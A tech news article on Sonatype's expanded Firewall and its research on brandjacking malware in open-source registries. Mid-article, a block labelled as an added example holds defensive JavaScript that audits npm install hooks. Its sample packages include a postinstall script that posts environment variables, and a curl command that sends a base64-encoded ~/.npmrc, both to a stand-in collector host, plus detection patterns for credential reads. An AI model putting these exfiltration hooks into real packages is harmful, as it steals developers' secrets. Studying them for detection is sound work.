eCommerceNews US - Technology news for digital commerce decision-makers
Sonatype expands Firewall to block malicious packages

Mon, 1st Jun 2026

Sonatype has expanded its Firewall product to block malicious open source packages before they enter any repository environment, as its latest research suggests most brandjacking malware no longer relies on typosquatting alone.

The expanded protection now covers any repository environment, including third-party repositories and mixed repository setups. It is designed to stop harmful packages when developers or coding tools pull open source components from public registries.

Alongside the product update, Sonatype published research based on analysis of more than 4,300 malicious open source packages. The study found that attackers are increasingly using package names that appear routine and credible within software projects, rather than obvious misspellings of trusted names.

According to the findings, 91% of the brandjacking malware examined went beyond traditional typosquatting. The study also found that 74% of malicious packages targeted developer data, including environment information, secrets, or both.

The figures point to a shift in how attackers try to gain access to software supply chains. Instead of depending on typing mistakes, campaigns are using naming patterns that resemble legitimate tools, extensions, and framework-related packages.

Changing tactics

Sonatype identified 174 campaign families in the data, suggesting these attacks are becoming more organised. It also found 540 malicious packages targeting the React framework, underlining the focus on widely used developer ecosystems where add-ons and helper packages are common.

This makes defences that look only for near-misses of known package names less effective, the company argued. A package whose name fits the conventions of an ecosystem can appear normal enough to avoid scrutiny when a developer adds a dependency, updates a lockfile, or installs a utility package tied to a popular framework.

That matters because malicious packages are often designed to steal credentials, API keys, and environment variables from developer machines. If successful, that initial compromise can give attackers a path into broader systems and repositories.
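The behaviour described above is what a pre-install control should be looking for, rather than the package name. The following is an added example, not Sonatype's code and not part of the original article: a small audit that inspects the lifecycle scripts a package would run on install and flags the combination of reading developer data and sending it off the machine. The package manifests, file contents and hostnames are constructed for illustration, and the regexes, finding labels and the framework-prefix list are assumptions chosen for this example.

```javascript
// Added example, not Sonatype's code: audit a package by behaviour, not by name.
// npm runs lifecycle scripts (preinstall, install, postinstall, prepare)
// automatically during `npm install`, so a package that reads process.env and
// posts it somewhere from one of those hooks has already succeeded before any
// developer imports it. All manifests, files and hosts below are constructed.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Reads of developer data: environment, registry tokens, cloud and SSH creds.
const ENV_READ = /process\.env\b|os\.environ|~\/\.npmrc|\.aws\/credentials|\.ssh\//;
// Ways of moving that data off the machine.
const NETWORK_SEND = /\bhttps?\.request\(|\bfetch\(|\bnet\.connect\(|\bdns\.(?:resolve|lookup)\(|\bcurl\s|\bwget\s/;
// Common ways of hiding the above from a casual read (assumed heuristics).
const OBFUSCATION = /\beval\(|new Function\(|fromCharCode|(?:\\x[0-9a-f]{2}){4}/i;
// Name prefixes that make a package look like an ordinary ecosystem add-on.
const FRAMEWORK_PREFIX = /^(?:@?react|vue|next|angular|svelte)[-\/]/;

// pkg = { manifest: parsed package.json, files: { relativePath: contents } }
function auditPackage(pkg) {
  const findings = [];
  const { name = "", repository, scripts = {} } = pkg.manifest;

  // Context signal only: an ecosystem-style name with no stated source repo.
  if (FRAMEWORK_PREFIX.test(name) && !repository) {
    findings.push("context:framework-name-no-repository");
  }

  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    findings.push(`lifecycle:${hook}`);
    const cmd = scripts[hook];
    // "node ./x.js" -> inspect x.js from the unpacked tarball;
    // anything else is a shell command and is inspected as written.
    const m = /\bnode\s+(\S+\.js)/.exec(cmd);
    const body = m ? pkg.files[m[1].replace(/^\.\//, "")] || "" : cmd;
    const readsData = ENV_READ.test(body);
    const sendsOut = NETWORK_SEND.test(body);
    if (readsData) findings.push(`${hook}:reads-developer-data`);
    if (sendsOut) findings.push(`${hook}:network-egress`);
    if (OBFUSCATION.test(body)) findings.push(`${hook}:obfuscated`);
    if (readsData && sendsOut) findings.push(`${hook}:exfiltration-pattern`);
  }
  return findings;
}

// Policy applied before the package is installed, not after.
function verdict(findings) {
  if (findings.some((f) => f.endsWith(":exfiltration-pattern"))) return "block";
  if (findings.length > 0) return "review";
  return "allow";
}

// Constructed samples: names, scripts and hosts are invented for this example.
const SAMPLES = [
  { // plausible React helper whose postinstall ships process.env out
    manifest: { name: "react-hooks-utils", version: "1.0.3", scripts: { postinstall: "node ./setup.js" } },
    files: { "setup.js": [
      'const https = require("https");',
      'const data = JSON.stringify({ env: process.env, home: require("os").homedir() });',
      'const req = https.request({ host: "collector.example.invalid", method: "POST", path: "/i" });',
      "req.end(data);",
    ].join("\n") },
  },
  { // lifecycle hook present but it only writes a local file: needs a look, not a block
    manifest: { name: "react-version-helper", version: "0.2.0", scripts: { postinstall: "node ./build.js" } },
    files: { "build.js": 'require("fs").writeFileSync("version.json", JSON.stringify({ built: Date.now() }));' },
  },
  { // inline shell preinstall that reads the registry token and curls it out
    manifest: { name: "tiny-date-format", version: "2.1.0",
      scripts: { preinstall: "curl -s https://collector.example.invalid/$(base64 ~/.npmrc)" } },
    files: {},
  },
  { // ordinary library: no hooks, source repository declared
    manifest: { name: "tiny-csv", version: "3.0.1", repository: "git+https://git.example.invalid/tiny-csv.git" },
    files: { "index.js": "module.exports = (s) => s.split(',');" },
  },
];

for (const pkg of SAMPLES) {
  const findings = auditPackage(pkg);
  console.log(pkg.manifest.name, verdict(findings), findings.join(" "));
}
```

The point of the split between "block" and "review" is that a lifecycle script on its own is common in legitimate packages; what separates the first and third samples from the second is the pairing of a read of developer data with an outbound channel in code that runs unattended at install time. In a real control point the same logic would run against the unpacked tarball fetched from the registry, before the package manager is allowed to execute it.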

The expanded Firewall is intended to create a control point in front of public package registries before code reaches a build environment. Sonatype described the approach as a way to screen components earlier in the software assembly process without requiring organisations to change repository workflows.

Developer exposure

The broader trend highlighted by the research is that attackers are imitating the language and structure of real software ecosystems. In practice, that means malicious packages can be made to look like ordinary framework plugins, version-related utilities, or operational helper modules.

This creates a challenge for engineering and security teams, particularly as development environments become more automated and AI coding assistants play a larger role in recommending or adding dependencies. A package that looks plausible may pass through normal workflows before anyone has reason to question it.

Sonatype has long been active in the open source package ecosystem through Maven Central and Nexus Repository, giving it visibility into how components are published and consumed. The company is using that position to argue that software security controls need to assess context and campaign behaviour, not just package names.

The findings suggest the label "typosquatting" no longer captures the main pattern of attack. In Sonatype's view, the more important issue is the creation of manufactured legitimacy through names that fit seamlessly into modern software development practices.

Brian Fox, Chief Technology Officer and Co-Founder of Sonatype and Global Maintainer of Maven Central, commented on the shift in attack methods. "Typosquatting is table stakes now. Attackers aren't just misspelling popular package names - they're copying the language, structure, and habits of real software ecosystems. By the time a malicious package has built a reputation, it may already be in a developer workstation," Fox said.

He also set out the company's argument for earlier intervention in dependency selection. "Developers and AI agents need safer defaults, not more dashboards. The winning model is to approve, block, guide, and remediate when a component is chosen - not after bad code is already in the build," Fox said.